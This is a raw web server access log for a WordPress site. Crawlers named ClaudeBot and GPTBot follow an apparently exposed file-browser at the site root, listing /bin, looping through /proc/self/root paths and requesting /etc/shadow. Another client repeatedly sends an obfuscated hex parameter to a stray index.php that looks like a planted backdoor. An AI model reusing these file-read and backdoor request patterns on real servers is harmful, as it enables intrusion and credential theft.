216.73.216.191 - - [18/Mar/2026:00:29:27 -0300] "GET /?fileloc=%2F%2Fbin%2Fpkttyagent&path=%2F%2Fbin HTTP/1.1" 200 12724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:27 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/firmware/qlogic HTTP/1.1" 200 27513 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
179.188.53.243 - - [18/Mar/2026:00:24:31 -0300] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313737333830373837312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333830343237312q6530386435363666636561383532303839653332343734663335316463363638222p2232223n226163383530623966383661626535623466666439623632306136613266616630222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232362q34342q36302q36392q38302q38342q3233227q HTTP/1.1" 504 247 "-" "-"
74.7.243.128 - - [18/Mar/2026:00:29:28 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld HTTP/1.1" 200 26985 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:29 -0300] "GET /?fileloc=%2F%2Fbin%2Fpyrsa-encrypt&path=%2F%2Fbin HTTP/1.1" 200 13029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:30 -0300] "GET /?fileloc=%2F%2Fbin%2Feuscale-delete-notification-configuration&path=%2F%2Fbin HTTP/1.1" 200 12982 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:31 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/lib/firmware/ti-keystone HTTP/1.1" 200 19840 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:29:31 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/firmware/imx/sdma HTTP/1.1" 200 21703 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/firmware/imx" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:32 -0300] "GET /?fileloc=%2F%2Fbin%2Faka&path=%2F%2Fbin HTTP/1.1" 200 12717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:32 -0300] "GET /?fileloc=%2F%2Fbin%2Ffind&path=%2F%2Fbin HTTP/1.1" 200 12718 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:32 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware/acenic HTTP/1.1" 200 21542 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:29:33 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/cwd/images/images HTTP/1.1" 200 24647 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/cwd/images" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:33 -0300] "GET /?fileloc=%2F%2Frun%2Flock%2Fmybackup&path=%2F%2Frun%2Flock HTTP/1.1" 200 12763 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:34 -0300] "GET /?path=%2Fhome%2Fstorage%2F0%2Ffc%2F16%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2Fjs%2Ftinymce%2Fplugins%2Fmedia HTTP/1.1" 200 17452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:34 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/firmware/ositech HTTP/1.1" 200 19783 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:29:34 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/tuned/balanced HTTP/1.1" 200 19901 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/tuned" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:35 -0300] "GET /?fileloc=%2F%2Fbin%2Ftsort&path=%2F%2Fbin HTTP/1.1" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:35 -0300] "GET /?fileloc=%2F%2Fbin%2Faserver&path=%2F%2Fbin HTTP/1.1" 200 12721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:35 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/sys/hypervisor HTTP/1.1" 200 16788 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/sys" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:29:36 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib/firmware/isci HTTP/1.1" 200 19325 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:36 -0300] "GET /?fileloc=%2F%2Fbin%2Fcurl&path=%2F%2Fbin HTTP/1.1" 200 12718 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:36 -0300] "GET /?fileloc=%2F%2Fetc%2Fshadow&path=%2F%2Fetc HTTP/1.1" 403 74371 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:37 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/opt/puppetlabs/facter/facts.d HTTP/1.1" 200 17253 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/opt/puppetlabs/facter" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:29:37 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/include/asm HTTP/1.1" 200 156380 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/include" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:37 -0300] "GET /?fileloc=%2F%2Fbin%2Ftar&path=%2F%2Fbin HTTP/1.1" 200 12717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:38 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs HTTP/1.1" 200 23373 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:38 -0300] "GET /?path=%2Fhome%2Fstorage%2F0%2Ffc%2F16%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2Fjs%2Ftinymce%2Fplugins%2Fwplink HTTP/1.1" 200 17461 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:39 -0300] "GET /?fileloc=%2F%2Fbin%2Fnl-util-addr&path=%2F%2Fbin HTTP/1.1" 200 12726 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.128 - - [18/Mar/2026:00:29:39 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/firmware/intel/ice HTTP/1.1" 200 19611 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/firmware/intel" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:39 -0300] "GET /?fileloc=%2F%2Fbin%2Fwdctl&path=%2F%2Fbin HTTP/1.1" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:40 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/systemd/initctl HTTP/1.1" 200 17570 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/systemd" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:41 -0300] "GET /?fileloc=%2F%2Fbin%2Fmybackup.py&path=%2F%2Fbin HTTP/1.1" 200 34655 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:41 -0300] "GET /?fileloc=%2F%2Fbin%2Fusleep&path=%2F%2Fbin HTTP/1.1" 200 12720 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.128 - - [18/Mar/2026:00:29:42 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/udev/rules.d HTTP/1.1" 200 130857 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/udev" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:42 -0300] "GET /?fileloc=%2F%2Fbin%2Fsha512sum&path=%2F%2Fbin HTTP/1.1" 200 12723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:43 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth HTTP/1.1" 403 74371 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:44 -0300] "GET /?fileloc=%2F%2Fbin%2Feuare-grouplistusers&path=%2F%2Fbin HTTP/1.1" 200 12876 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:45 -0300] "GET /?fileloc=%2F%2Fbin%2Fgrops&path=%2F%2Fbin HTTP/1.1" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.128 - - [18/Mar/2026:00:29:46 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware/amd HTTP/1.1" 200 19182 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:46 -0300] "GET /?fileloc=%2F%2Fbin%2Feasy_install&path=%2F%2Fbin HTTP/1.1" 200 13046 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:47 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/opt/puppetlabs/puppet/ssl/misc HTTP/1.1" 200 23867 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/opt/puppetlabs/puppet/ssl" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:47 -0300] "GET /?fileloc=%2F%2Fbin%2Fgcc&path=%2F%2Fbin HTTP/1.1" 200 12717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:48 -0300] "GET /?fileloc=%2F%2Fbin%2Feuca-delete-network-acl&path=%2F%2Fbin HTTP/1.1" 200 12903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.128 - - [18/Mar/2026:00:29:49 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/systemd/system HTTP/1.1" 200 77109 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/systemd" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
179.188.53.243 - - [18/Mar/2026:00:24:53 -0300] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313737333830373839332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333830343239332q3062386266663135663733623664626465323839633761303134383132343032222p2232223n226163383530623966383661626535623466666439623632306136613266616630222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232362q34342q36302q36392q38302q38342q3233227q HTTP/1.1" 504 247 "-" "-"
216.73.216.191 - - [18/Mar/2026:00:29:50 -0300] "GET /?fileloc=%2F%2Fbin%2Feuca-bundle-and-upload-image&path=%2F%2Fbin HTTP/1.1" 200 12926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:50 -0300] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib/libyaml-cpp.so&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib HTTP/1.1" 200 16993 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:51 -0300] "GET /?fileloc=%2F%2Fbin%2Ftop&path=%2F%2Fbin HTTP/1.1" 200 12717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:52 -0300] "GET /?path=%2Fhome%2Fstorage%2F0%2Ffc%2F16%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2Fjs%2Ftinymce%2Fplugins%2Fwpautoresize HTTP/1.1" 200 17520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.128 - - [18/Mar/2026:00:29:53 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/instances/done HTTP/1.1" 200 41396 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/instances" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:53 -0300] "GET /?path=%2Fhome%2Fstorage%2F0%2Ffc%2F16%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2Fjs%2Ftinymce%2Fplugins%2Ftextcolor HTTP/1.1" 200 17491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:54 -0300] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib/libboost_filesystem.so.1.73&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib HTTP/1.1" 200 17006 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.244.43 - - [18/Mar/2026:00:29:55 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
216.73.216.191 - - [18/Mar/2026:00:29:54 -0300] "GET /?path=%2Fhome%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2Fblock-patterns HTTP/1.1" 200 25251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:54 -0300] "GET /?path=%2Fhome%2Fstorage%2F0%2Ffc%2F16%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2Fjs%2Ftinymce%2Fplugins%2Fcharmap HTTP/1.1" 200 17471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.128 - - [18/Mar/2026:00:29:55 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld/ipsets HTTP/1.1" 200 19957 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:55 -0300] "GET /?path=%2Fhome%2Fstorage%2F0%2Ffc%2F16%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2Fjs%2Ftinymce%2Fplugins%2Fwpgallery HTTP/1.1" 200 17490 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:29:55 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/sys/devices/breakpoint HTTP/1.1" 200 17597 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/sys/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:56 -0300] "GET /?path=%2Fhome%2Fstorage%2F0%2Ffc%2F16%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2Fjs%2Ftinymce%2Fplugins%2Flink HTTP/1.1" 200 17440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:56 -0300] "GET /?fileloc=%2F%2Fbin%2Ffg&path=%2F%2Fbin HTTP/1.1" 200 12752 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.128 - - [18/Mar/2026:00:29:56 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld/helpers HTTP/1.1" 200 46531 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:57 -0300] "GET /?path=%2Fhome%2Fstorage%2F0%2Ffc%2F16%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2FRequests%2Fsrc%2FResponse HTTP/1.1" 200 15603 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
